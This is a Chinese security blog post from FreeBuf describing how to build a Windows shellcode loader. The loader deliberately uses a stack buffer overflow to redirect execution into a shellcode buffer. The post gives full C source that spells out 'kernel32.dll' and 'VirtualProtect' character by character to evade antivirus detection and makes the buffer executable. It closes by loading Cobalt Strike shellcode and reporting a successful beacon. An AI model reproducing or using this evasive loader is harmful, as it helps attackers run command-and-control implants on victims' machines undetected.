freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

shellcode加载之使用栈溢出加载shellcode
2023-08-04 19:26:03

最近在看pwn和免杀,发觉可以使用栈溢出来加载shellcode,就做了一些尝试,使用栈溢出来编写加载器。

loader函数如下

int loader(int size, char* str) {
char eee[10];
memcpy(eee, str, size);
return 0;
}

接下来做个测试,来判断哪个位置会覆盖到返回地址

测试代码如下

#include<stdio.h>
#include<Windows.h>

int loader(int size, char* str) {
char eee[10];
memcpy(eee, str, size);
return 0;
}

int main() {
char* iii = "11111111222222223333333344444444555555556666666677777777888888889999999900000000aaaaaaaabbbbbbbb";
loader(200, iii);

system("pause");
}

但是在测试之前,还需要对vs进行一些配置,禁用基本运行时检查和安全检查

1691145113_64ccd3996803ee0e43464.png!small

关闭优化

1691145413_64ccd4c5a7e093513d090.png!small

编译后使用xdebug打开进行调试

1691145519_64ccd52f0f0f8c392e5dd.png!small

ret返回时,栈顶指针执行3636363636363636,0x36是6的ascii码,那么loader函数的返回地址位置就是66666666那里,只需要将66666666换成shellcode地址就可以进行加载了。

依据上面思路,不难写出下面加载代码

#include<stdio.h>
#include<Windows.h>

unsigned char buf[] = "yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy";

int loader(int size, char* str) {
char eee[10];
memcpy(eee, str, size);
return 0;
}

int main() {
size_t tmp = (size_t)buf;
char* tt = (char*)(&tmp);
printf("%p\n", buf);
char* iii = "1111111122222222333333334444444455555555";
char pp[200];
DWORD size= (strlen(iii));
int i;
for (i = 0; i < size; i++) {
pp[i] = iii[i];
}
pp[i] = *tt;pp[i + 1] = *(tt + 1);pp[i + 2] = *(tt + 2);pp[i + 3] = *(tt + 3);
pp[i + 4] = *(tt + 4);pp[i + 5] = *(tt + 5);pp[i + 6] = *(tt + 6);pp[i + 7] = *(tt + 7);

char DllBuff[13];
DllBuff[0] = 'k';
DllBuff[1] = 'e';
DllBuff[2] = 'r';
DllBuff[3] = 'n';
DllBuff[4] = 'e';
DllBuff[5] = 'l';
DllBuff[6] = '3';
DllBuff[7] = '2';
DllBuff[8] = '.';
DllBuff[9] = 'd';
DllBuff[10] = 'l';
DllBuff[11] = 'l';
DllBuff[12] = '\x00';
char ViProBuff[15];
ViProBuff[0] = 'V';
ViProBuff[1] = 'i';
ViProBuff[2] = 'r';
ViProBuff[3] = 't';
ViProBuff[4] = 'u';
ViProBuff[5] = 'a';
ViProBuff[6] = 'l';
ViProBuff[7] = 'P';
ViProBuff[8] = 'r';
ViProBuff[9] = 'o';
ViProBuff[10] = 't';
ViProBuff[11] = 'e';
ViProBuff[12] = 'c';
ViProBuff[13] = 't';
ViProBuff[14] = '\x00';
HMODULE DllModule = LoadLibraryA(DllBuff);
FARPROC addr = GetProcAddress(DllModule, ViProBuff);
DWORD oldProtect = 0;
BOOL ret = addr((LPVOID)buf, sizeof buf, PAGE_EXECUTE_READWRITE, &oldProtect);


loader(200, pp);
system("pause");
}

下面使用cs生成shellcode进行加载

1691147628_64ccdd6cd12e3b53e7aa1.png!small

成功上线

# shellcode # 免杀 # 加载器
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者